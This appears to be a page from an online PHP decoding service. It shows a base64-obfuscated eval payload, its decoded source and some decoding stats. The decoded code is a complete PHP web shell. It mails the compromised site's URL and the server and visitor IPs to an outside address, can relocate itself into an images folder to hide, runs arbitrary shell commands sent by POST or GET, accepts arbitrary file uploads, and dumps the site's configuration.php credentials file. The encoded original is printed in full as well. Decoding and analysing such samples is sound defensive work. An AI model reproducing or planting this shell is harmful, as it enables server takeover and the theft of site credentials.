Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KaWYgKCFpc3NldCgkX1NFU1NJT05bJ2JhamFr..
Decoded Output download
error_reporting(0);
if (!isset($_SESSION['bajak'])) {
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "ada yang inject
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body","Hasil Bajakan http://$web$inj
$security
IP Server = $serper
IP Injector= $injektor");
$_SESSION['bajak'] = 0;
}
else {$_SESSION['bajak']++;};
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti =$_SERVER['DOCUMENT_ROOT']."/images/stories/food/footer.php";
rename($source, $desti);
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF";}
else {$security= "SAFE_MODE : ON";}
echo "<title>Shunceng</title><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Upload Success to ".$uploaddir.$name." :P "; }
}
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>";
}
elseif(isset($_GET['cmd'])){
$comd = $_GET['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($comd)."</font></pre>";
}
elseif(isset($_GET['rf'])){
$rf = file_get_contents("../../configuration.php");
echo $rf;
}
else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>";
}Did this file decode correctly?
Original Code
<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KaWYgKCFpc3NldCgkX1NFU1NJT05bJ2JhamFrJ10pKQl7DQokdmlzaXRjb3VudCA9IDA7DQokd2ViID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdOw0KJGluaiA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOw0KJGJvZHkgPSAiYWRhIHlhbmcgaW5qZWN0IFxuJHdlYiRpbmoiOw0KJHNhZmVtMGRlID0gQGluaV9nZXQoJ3NhZmVfbW9kZScpOw0KaWYgKCEkc2FmZW0wZGUpIHskc2VjdXJpdHk9ICJTQUZFX01PREUgPSBPRkYiO30NCmVsc2UgeyRzZWN1cml0eT0gIlNBRkVfTU9ERSA9IE9OIjt9Ow0KJHNlcnBlcj1nZXRob3N0YnluYW1lKCRfU0VSVkVSWydTRVJWRVJfQUREUiddKTsNCiRpbmpla3RvciA9IGdldGhvc3RieW5hbWUoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10pOw0KbWFpbCgic2h1bmNlbmdAYXNpYS5jb20iLCAiJGJvZHkiLCJIYXNpbCBCYWpha2FuIGh0dHA6Ly8kd2ViJGlualxuJHNlY3VyaXR5XG5JUCBTZXJ2ZXIgPSAkc2VycGVyXG4gSVAgSW5qZWN0b3I9ICRpbmpla3RvciIpOw0KJF9TRVNTSU9OWydiYWphayddID0gMDsNCn0NCmVsc2UgeyRfU0VTU0lPTlsnYmFqYWsnXSsrO307DQppZihpc3NldCgkX0dFVFsnY2xvbmUnXSkpew0KJHNvdXJjZSA9ICRfU0VSVkVSWydTQ1JJUFRfRklMRU5BTUUnXTsNCiRkZXN0aSA9JF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4iL2ltYWdlcy9zdG9yaWVzL2Zvb2QvZm9vdGVyLnBocCI7DQpyZW5hbWUoJHNvdXJjZ
SwgJGRlc3RpKTsNCn0NCiRzYWZlbTBkZSA9IEBpbmlfZ2V0KCdzYWZlX21vZGUnKTsNCmlmICghJHNhZmVtMGRlKSB7JHNlY3VyaXR5PSAiU0FGRV9NT0RFIDogT0ZGIjt9DQplbHNlIHskc2VjdXJpdHk9ICJTQUZFX01PREUgOiBPTiI7fQ0KZWNobyAiPHRpdGxlPlNodW5jZW5nPC90aXRsZT48YnI+IjsNCmVjaG8gIjxmb250IHNpemU9MiBjb2xvcj0jODg4ODg4PjxiPiIuJHNlY3VyaXR5LiI8L2I+PGJyPiI7DQokY3VyX3VzZXI9IigiLmdldF9jdXJyZW50X3VzZXIoKS4iKSI7DQplY2hvICI8Zm9udCBzaXplPTIgY29sb3I9Izg4ODg4OD48Yj5Vc2VyIDogdWlkPSIuZ2V0bXl1aWQoKS4kY3VyX3VzZXIuIiBnaWQ9Ii5nZXRteWdpZCgpLiRjdXJfdXNlci4iPC9iPjxicj4iOw0KZWNobyAiPGZvbnQgc2l6ZT0yIGNvbG9yPSM4ODg4ODg+PGI+VW5hbWUgOiAiLnBocF91bmFtZSgpLiI8L2I+PGJyPiI7DQpmdW5jdGlvbiBwd2QoKSB7DQokY3dkID0gZ2V0Y3dkKCk7DQppZigkdT1zdHJycG9zKCRjd2QsJy8nKSl7DQppZigkdSE9c3RybGVuKCRjd2QpLTEpew0KcmV0dXJuICRjd2QuJy8nO30NCmVsc2V7cmV0dXJuICRjd2Q7fTsNCn0NCmVsc2VpZigkdT1zdHJycG9zKCRjd2QsJ1xcJykpew0KaWYoJHUhPXN0cmxlbigkY3dkKS0xKXsNCnJldHVybiAkY3dkLidcXCc7fQ0KZWxzZXtyZXR1cm4gJGN3ZDt9Ow0KfTsNCn0NCmVjaG8gJzxmb3JtIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIiPjxmb250IHNpemU9MiBjb2xvcj0jODg4ODg4PjxiPkNvbW1hbmQ8L
2I+PGJyPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjbWQiPjxpbnB1dCB0eXBlPSJTdWJtaXQiIG5hbWU9ImNvbW1hbmQiIHZhbHVlPSJjb2siPjwvZm9ybT4nOw0KZWNobyAnPGZvcm0gZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgYWN0aW9uIG1ldGhvZD1QT1NUPjxmb250IHNpemU9MiBjb2xvcj0jODg4ODg4PjxiPlVwbG9hZCBGaWxlPC9iPjwvZm9udD48YnI+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9InN1Ym1pdCI+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPSJ1c2VyZmlsZSIgc2l6ZT0yOD48YnI+PGZvbnQgc2l6ZT0yIGNvbG9yPSM4ODg4ODg+PGI+TmV3IG5hbWU6IDwvYj48L2ZvbnQ+PGlucHV0IHR5cGU9dGV4dCBzaXplPTE1IG5hbWU9Im5ld25hbWUiIGNsYXNzPXRhPjxpbnB1dCB0eXBlPXN1Ym1pdCBjbGFzcz0iYnQiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOw0KaWYoaXNzZXQoJF9QT1NUWydzdWJtaXQnXSkpew0KJHVwbG9hZGRpciA9IHB3ZCgpOw0KaWYoISRuYW1lPSRfUE9TVFsnbmV3bmFtZSddKXskbmFtZSA9ICRfRklMRVNbJ3VzZXJmaWxlJ11bJ25hbWUnXTt9Ow0KbW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbJ3VzZXJmaWxlJ11bJ3RtcF9uYW1lJ10sICR1cGxvYWRkaXIuJG5hbWUpOw0KaWYobW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbJ3VzZXJmaWxlJ11bJ3RtcF9uYW1lJ10sICR1cGxvYWRkaXIuJG5hbWUpKXsNCmVjaG8gIlVwbG9hZCBGYWlsZWQiOw0KfSBlbHNlIHsgZWNobyAiVXBsb2FkIFN1Y2Nlc3Mgd
G8gIi4kdXBsb2FkZGlyLiRuYW1lLiIgOlAgIjsgfQ0KfQ0KaWYoaXNzZXQoJF9QT1NUWydjb21tYW5kJ10pKXsNCiRjbWQgPSAkX1BPU1RbJ2NtZCddOw0KZWNobyAiPHByZT48Zm9udCBzaXplPTMgY29sb3I9IzAwMDAwMD4iLnNoZWxsX2V4ZWMoJGNtZCkuIjwvZm9udD48L3ByZT4iOw0KfQ0KZWxzZWlmKGlzc2V0KCRfR0VUWydjbWQnXSkpew0KJGNvbWQgPSAkX0dFVFsnY21kJ107DQplY2hvICI8cHJlPjxmb250IHNpemU9MyBjb2xvcj0jMDAwMDAwPiIuc2hlbGxfZXhlYygkY29tZCkuIjwvZm9udD48L3ByZT4iOw0KfQ0KZWxzZWlmKGlzc2V0KCRfR0VUWydyZiddKSl7DQokcmYgPSBmaWxlX2dldF9jb250ZW50cygiLi4vLi4vY29uZmlndXJhdGlvbi5waHAiKTsNCmVjaG8gJHJmOw0KfQ0KZWxzZSB7IGVjaG8gIjxwcmU+PGZvbnQgc2l6ZT0zIGNvbG9yPSMwMDAwMDA+Ii5zaGVsbF9leGVjKCdscyAtbGEnKS4iPC9mb250PjwvcHJlPiI7DQp9')); ?>Function Calls
| base64_decode | 1 |
Stats
| MD5 | f3a784cc4895cdce40c27d25135b7fbd |
| Eval Count | 1 |
| Decode Time | 93 ms |